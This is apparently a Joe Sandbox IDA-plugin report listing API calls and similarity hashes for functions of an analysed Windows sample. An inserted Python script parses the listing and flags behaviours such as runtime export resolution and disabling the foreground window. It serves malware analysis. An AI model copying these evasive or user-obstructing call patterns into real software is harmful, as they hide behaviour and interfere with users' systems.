                                                                              • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                                              • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                              • API String ID: 2918862794-1339284965
                                                                              • Opcode ID: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
                                                                              • Instruction ID: 78d57fd6bf002b5b6c2ef9560121a390c40c5b5e23dd256736785be4ed7191ec
                                                                              • Opcode Fuzzy Hash: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
                                                                              • Instruction Fuzzy Hash: 0E01D431B14204BBD7102FE4AC49FEB3B29EB86B12F11803AF505A11C4DB788909CA6D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@_wcsdupwcsncpy$Value
                                                                              • String ID:
                                                                              • API String ID: 3451606040-0
                                                                              • Opcode ID: 18ebab3364349f054bf8340b61c70f4d2165a231e3e0755032edd230e75b6dd8
                                                                              • Instruction ID: ef8ff848e519ff80595976f88fda9aa54c27a9e0628953f57c1371388918df2b
                                                                              • Opcode Fuzzy Hash: 18ebab3364349f054bf8340b61c70f4d2165a231e3e0755032edd230e75b6dd8
                                                                              • Instruction Fuzzy Hash: 70A1BD71504301AFCB209F18C88166BB7B1EF94348F05093EFD86A7395E77AD925CB9A
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 004094B1
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004094BF
                                                                              • IsWindowVisible.USER32(?), ref: 004094C6
                                                                                • Part of subcall function 0040DB12: RtlAllocateHeap.NTDLL(00000008,00000000,0040D38C), ref: 0040DB1E
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004094E3
                                                                              • GetForegroundWindow.USER32 ref: 004094FE
                                                                              • IsWindowEnabled.USER32(?), ref: 00409509
                                                                              • EnableWindow.USER32(?,00000000), ref: 00409519
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
                                                                              • String ID:
                                                                              • API String ID: 2983394722-0
                                                                              • Opcode ID: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
                                                                              • Instruction ID: d72cecd996af7503d4a55556d0eaf5d1fe8b6ec4fae3718c35eb9c11583601b7
                                                                              • Opcode Fuzzy Hash: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
                                                                              • Instruction Fuzzy Hash: B10175312043016ED3215B79AC88AAB7AE8EF95754B15803EF545E31A6DB74DC01C669
                                                                              APIs
                                                                              • EnumWindows.USER32(004094A7,?), ref: 0040953B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00409553
                                                                              • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,004092B0,00000000,00408E8A), ref: 0040956F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0040958F
                                                                              • EnableWindow.USER32(?,00000001), ref: 004095A5
                                                                              • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,004092B0,00000000,00408E8A), ref: 004095BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                                              • String ID:
                                                                              • API String ID: 2527101397-0
                                                                              • Opcode ID: a3a0aeb73a1e0995adc417d57e62e0e38a3107fe39a7a04aa6534d5b9020df72
                                                                              • Instruction ID: f5bff55c5df6c6442a3445df2da52706b8c810d9f19cb65a9eb7b3fa66b57753
                                                                              • Opcode Fuzzy Hash: a3a0aeb73a1e0995adc417d57e62e0e38a3107fe39a7a04aa6534d5b9020df72
                                                                              • Instruction Fuzzy Hash: 6A11AC32609351BBD7324B17EC08F53BBA9AB81B21F15863EF456221E1DB759D00C618
                                                                              APIs
                                                                              • TlsAlloc.KERNEL32(?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D318
                                                                              • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040D32C
                                                                              • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D339
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D350
                                                                              • RtlReAllocateHeap.NTDLL(00000008,00000000), ref: 0040D35F
                                                                              • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D36E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Value$AllocateHeap$Alloc
                                                                              • String ID:
                                                                              • API String ID: 2511646910-0
                                                                              • Opcode ID: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
                                                                              • Instruction ID: 9f859b01fecb640b0c0eeeefa64339d4fa0418cdbc8b4e3825918bdf59145f1e
                                                                              • Opcode Fuzzy Hash: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
                                                                              • Instruction Fuzzy Hash: 76116072B44710AFD7119FA9EC48AA67BB9FB48760B05843AFA04D33A0D7359C048B6C
                                                                              APIs
                                                                              • UnregisterWait.KERNEL32(?), ref: 00411CEE
                                                                              • CloseHandle.KERNEL32(?), ref: 00411CF7
                                                                              • RtlEnterCriticalSection.NTDLL(00417680), ref: 00411D03
                                                                              • RtlLeaveCriticalSection.NTDLL(00417680), ref: 00411D28
                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00411D46
                                                                              • HeapFree.KERNEL32(?,?), ref: 00411D58
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                                              • String ID:
                                                                              • API String ID: 4204870694-0
                                                                              • Opcode ID: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
                                                                              • Instruction ID: 8f9f96d7996d446dd79b7cbdc6e3cce5d3da35cfe841f16b8799e142d118698f
                                                                              • Opcode Fuzzy Hash: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
                                                                              • Instruction Fuzzy Hash: 6B012574202601BFCB119F15FD88A96BB79FF493513118139E61A87630C735AC51CB98
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00405562
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?), ref: 00405571
                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcmemset
                                                                              • String ID: RtlGetVersion$ntdll.dll
                                                                              • API String ID: 3137504439-1489217083
                                                                              • Opcode ID: 511749e795eec0cdce68fd6837bdff5dd9192a1533a247fbf36adb3b887cc1d8
                                                                              • Instruction ID: d7b210edb93dcdeb2ccead98f224fd87bedff0db37ff7f51e22340fec2856e60
                                                                              • Opcode Fuzzy Hash: 511749e795eec0cdce68fd6837bdff5dd9192a1533a247fbf36adb3b887cc1d8
                                                                              • Instruction Fuzzy Hash: E0E0DF317606127AD6202B32AC09FCB2F9DDFCAB00B15043AB109F21C4E67CC5018ABD
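The API listings in these blocks carry more signal than the hash lines: the LoadLibraryW / GetProcAddress(InitOnceExecuteOnce) / FreeLibrary sequence at 0040D9F1, the GetForegroundWindow / EnableWindow(?,00000000) pair at 004094B1, and the GetModuleHandleW(ntdll.dll) / GetProcAddress(RtlGetVersion) lookup at 00405562 are each a recognisable behaviour once the calls are read as a sequence rather than as isolated references. The Python script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses function blocks in this listing's format into per-function call sequences and applies a few heuristic rules of its own. The rules, the flag wording, and the `analyze`/`flag` names are this example's assumptions, not sandbox signatures; the embedded sample is constructed from lines of the listing above.

```python
"""Parse the per-function "APIs" blocks of a Joe Sandbox IDA-plugin listing and
flag call patterns that merit a closer look.  Added example: the rules below are
this example's own heuristics, not Joe Sandbox signatures."""
import re
from dataclasses import dataclass, field

# Constructed sample: three blocks in the shape of the listing, trimmed to the
# lines the parser uses (addresses and arguments copied from the report).
SAMPLE = """\
APIs
• LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040D9F1
• GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA06
• FreeLibrary.KERNEL32(00000000), ref: 0040DA21
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040DA30
• Sleep.KERNEL32(00000000), ref: 0040DA42
Strings
Memory Dump Source
• Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
• String ID: InitOnceExecuteOnce$Kernel32.dll
APIs
• GetWindowThreadProcessId.USER32(?,00000000), ref: 004094B1
• GetCurrentThreadId.KERNEL32 ref: 004094BF
• IsWindowVisible.USER32(?), ref: 004094C6
  • Part of subcall function 0040DB12: RtlAllocateHeap.NTDLL(00000008,00000000,0040D38C), ref: 0040DB1E
• GetForegroundWindow.USER32 ref: 004094FE
• EnableWindow.USER32(?,00000000), ref: 00409519
Memory Dump Source
Similarity
• API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
• String ID:
APIs
• memset.MSVCRT ref: 00405562
• GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?), ref: 00405571
• GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
Strings
Memory Dump Source
Similarity
• API ID: AddressHandleModuleProcmemset
• String ID: RtlGetVersion$ntdll.dll
"""

# "• Api.MODULE(arg,arg), ref: ADDR", optionally prefixed by "Part of subcall function X:"
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w@]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
META_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")   # "• Key: value"
LITERAL = re.compile(r"^(?:[0-9A-Fa-f]{8}|\?)$")   # hex constant or unknown argument


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: str = ""   # callee address when listed as "Part of subcall function"


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def entry(self) -> str:
        """Address of the first direct call; used to label the block."""
        return next((c.ref for c in self.calls if not c.subcall_of), "?")

    def direct_apis(self) -> set:
        return {c.api for c in self.calls if not c.subcall_of}


def parse_blocks(text: str) -> list:
    """Split the listing at each "APIs" heading and collect calls and metadata."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.calls.append(Call(m.group("api"), m.group("mod"), args,
                                  m.group("ref") or "?", m.group("sub") or ""))
            continue
        m = META_RE.match(line)
        if m:
            cur.meta[m.group("key")] = m.group("val").strip()
    return blocks


def flag(block: FunctionBlock) -> list:
    """Heuristic rules of this example (assumptions, not sandbox signatures)."""
    out = []
    apis = block.direct_apis()
    for c in block.calls:
        # GetProcAddress with a literal export name: the import is hidden from the IAT
        if c.api == "GetProcAddress" and len(c.args) >= 2 and not LITERAL.match(c.args[1]):
            out.append(f"resolves {c.args[1]} at runtime via GetProcAddress")
        # EnableWindow(hWnd, FALSE) greys out a window; check which one is targeted
        if c.api == "EnableWindow" and len(c.args) >= 2 and c.args[1] == "00000000":
            target = "the foreground window" if "GetForegroundWindow" in apis else "a window"
            out.append(f"EnableWindow(hWnd, FALSE): disables {target}")
    if {"LoadLibraryW", "GetProcAddress", "FreeLibrary"} <= apis:
        out.append("loads a DLL only to probe one export, then unloads it")
    if "GetModuleHandleW" in apis and any("ntdll.dll" in c.args for c in block.calls):
        out.append("looks up an export of the already-loaded ntdll.dll")
    return out


def analyze(text: str) -> dict:
    """Map each flagged block's entry address to its list of findings."""
    result = {}
    for b in parse_blocks(text):
        findings = flag(b)
        if findings:
            result[b.entry] = findings
    return result


if __name__ == "__main__":
    for entry, findings in analyze(SAMPLE).items():
        print(f"function @ {entry}:")
        for f in findings:
            print(f"  - {f}")
```

Run against a saved copy of the report text instead of `SAMPLE` to get one line per flagged function. The "Part of subcall function" lines are kept but excluded from the per-function API set, so a heap allocation inside a callee does not make the caller look like an allocator; the entry label is the first direct reference address, which is what you would jump to in the IDA snapshot named in each block.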
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054AB
                                                                              • RtlEnterCriticalSection.NTDLL(004176A0), ref: 004054BD
                                                                              • WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054D4
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00402E2C,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054E0
                                                                              • RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405523
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 458812214-0
                                                                              • Opcode ID: 6ed1f9472aaecad8110596c08d16cfc3ba6fdd38aae9ed686341541dbb8ce168
                                                                              • Instruction ID: c80a9bd37122c97109a10f206962e584b77ac8964ddc4e7c45fa9607085a50ae
                                                                              • Opcode Fuzzy Hash: 6ed1f9472aaecad8110596c08d16cfc3ba6fdd38aae9ed686341541dbb8ce168
                                                                              • Instruction Fuzzy Hash: 1111A336204710BFC2115F59EC05E97BB69EB45762722802AF80197294EB75E9508F6D
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(0041761C), ref: 0040D8FA
                                                                              • RtlLeaveCriticalSection.NTDLL(0041761C), ref: 0040D94F
                                                                                • Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D948
                                                                              • RtlDeleteCriticalSection.NTDLL(00000020), ref: 0040D968
                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409E88,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D977
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                              • String ID:
                                                                              • API String ID: 3171405041-0
                                                                              • Opcode ID: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
                                                                              • Instruction ID: 7b35f574515ae906377effd3f95b136c975bcdd302f3c0dc89a566dd6d791b35
                                                                              • Opcode Fuzzy Hash: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
                                                                              • Instruction Fuzzy Hash: BB1158B5502601EFC320AF59EC08F97BBB5FF44311F11843AA44AA36A1C734E849CF98
                                                                              APIs
                                                                                • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000000E), ref: 0040E20C
                                                                                • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 0040E267
                                                                              • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
                                                                              • wcscmp.MSVCRT ref: 00409662
                                                                              • memmove.MSVCRT ref: 0040967A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                                                                              • String ID: \\?\
                                                                              • API String ID: 2309408642-4282027825
                                                                              • Opcode ID: 4647b580265c0145cb53452cd045566aab0e6573de3ebb33f2025e25eda63a47
                                                                              • Instruction ID: d9f8f264266041fd0450fbf5fddac35174bfa4872681c7093a6bedb058d4d6d6
                                                                              • Opcode Fuzzy Hash: 4647b580265c0145cb53452cd045566aab0e6573de3ebb33f2025e25eda63a47
                                                                              • Instruction Fuzzy Hash: 36F082B31007017BD2106777EC89CAB7F6CEB953B47500A3FF915D25D1EA39982486B8
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(?,00409825), ref: 0040D28F
                                                                              • RtlAllocateHeap.NTDLL(00000008), ref: 0040D2AA
                                                                              • TlsSetValue.KERNEL32(00000000,?,?,00409825), ref: 0040D2B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Value$AllocateHeap
                                                                              • String ID: zJ
                                                                              • API String ID: 4003031417-2817043822
                                                                              • Opcode ID: b6fa0aa91cfb2dda7c355575a8d23ae573fcd81ff672684e9cee781b12038817
                                                                              • Instruction ID: 16796b595869507936613635a6341ddf17832f1f70e812bebed35ae43026f1bf
                                                                              • Opcode Fuzzy Hash: b6fa0aa91cfb2dda7c355575a8d23ae573fcd81ff672684e9cee781b12038817
                                                                              • Instruction Fuzzy Hash: 15F06D36644600ABCA264B5AFC08E973B76EBC0770305883EF946A32A0CB34EC44CA1C
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: memset$memcpy
                                                                              • String ID:
                                                                              • API String ID: 368790112-0
                                                                              • Opcode ID: 8039a587939ac30c6fc37cd8e94445a8ac57574f9db84ba66d1265f83776addf
                                                                              • Instruction ID: d1c0989406727a65e9950a574f083ae989d166c781cac5fdd553c274dd2af307
                                                                              • Opcode Fuzzy Hash: 8039a587939ac30c6fc37cd8e94445a8ac57574f9db84ba66d1265f83776addf
                                                                              • Instruction Fuzzy Hash: D821F1317507082BE124AA29DC86F9F738CDB81708F40063EF201FA1C1CAB9F54546AE
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeapwcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1358295784-0
                                                                              • Opcode ID: abfa07bf7e2ff51294c19b5adc2ec100302e178060cdb4fdf4646927b08b7264
                                                                              • Instruction ID: cb064e81f22c81d64e764a7bfd7558cc4db0c0b6a5bd9f26a61017110445664c
                                                                              • Opcode Fuzzy Hash: abfa07bf7e2ff51294c19b5adc2ec100302e178060cdb4fdf4646927b08b7264
                                                                              • Instruction Fuzzy Hash: 2151DE305087059BDB209F28D844A6BB7F4FF84348F544A2EFC45A72D0E778E915CB9A
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0040D533
                                                                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D5E8
                                                                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D60B
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0040D663
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCriticalHeapSection$EnterLeave
                                                                              • String ID:
                                                                              • API String ID: 3625150316-0
                                                                              • Opcode ID: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
                                                                              • Instruction ID: c75203acf5dbc6b13cd53f4330a4279d02754d6c9a51f963ab4d277c9f4d2c3e
                                                                              • Opcode Fuzzy Hash: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
                                                                              • Instruction Fuzzy Hash: 67510570900B02AFC324CF69D980922B7F4FF587147108A3EE8AA97A94D335F959CB94
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CharLower
                                                                              • String ID:
                                                                              • API String ID: 1615517891-0
                                                                              • Opcode ID: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
                                                                              • Instruction ID: 85927fc96f9716e1d1e6d5b1ddc4ac0db90fb70db8c0b3b43891102a4ed5054c
                                                                              • Opcode Fuzzy Hash: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
                                                                              • Instruction Fuzzy Hash: 3A215775A043198BC710EF59A840477B7E4EB80761F46087AFC85A3380D63AEE199BB9
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeapmemsetwcscpywcslen
                                                                              • String ID:
                                                                              • API String ID: 2037025450-0
                                                                              • Opcode ID: 60b0d08681e9ec0db2ddeea0910c20863a20b1ea765bcf14a5cb697a1bcb1fc5
                                                                              • Instruction ID: 6837a03683538e1df5e2bdda5e350eaa22186be17e149c7482ea07580a24f61f
                                                                              • Opcode Fuzzy Hash: 60b0d08681e9ec0db2ddeea0910c20863a20b1ea765bcf14a5cb697a1bcb1fc5
                                                                              • Instruction Fuzzy Hash: 2F21F732400B04AFC331AF259881B67B7F5EF88318F14453FFA4562692D739A8148B1E
                                                                              APIs
                                                                                • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E9A
                                                                                • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
                                                                                • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
                                                                                • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0
                                                                              • RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409D9F
                                                                              • RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409DC5
                                                                              • RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409E22
                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Free$Allocate
                                                                              • String ID:
                                                                              • API String ID: 3472947110-0
                                                                              • Opcode ID: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
                                                                              • Instruction ID: 0e5c90150bc367b96ffc2f2020c4fe6cd7e8dd6a87ef93d6b65d9b762928b75a
                                                                              • Opcode Fuzzy Hash: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
                                                                              • Instruction Fuzzy Hash: 66216D71644711ABD3118F2ADD01B46BBE8FF48750F40812AB608E7691D770EC65CB98
                                                                              APIs
                                                                              • wcslen.MSVCRT ref: 0040E0E5
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,0000000A), ref: 0040E109
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,00000000,0000000A), ref: 0040E12D
                                                                              • HeapFree.KERNEL32(?,00000000), ref: 0040E164
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Allocate$Freewcslen
                                                                              • String ID:
                                                                              • API String ID: 584413571-0
                                                                              • Opcode ID: d10227275c7b6081de2ee05023da87eadddda2e83e478cb8004c91b3b4e22bf4
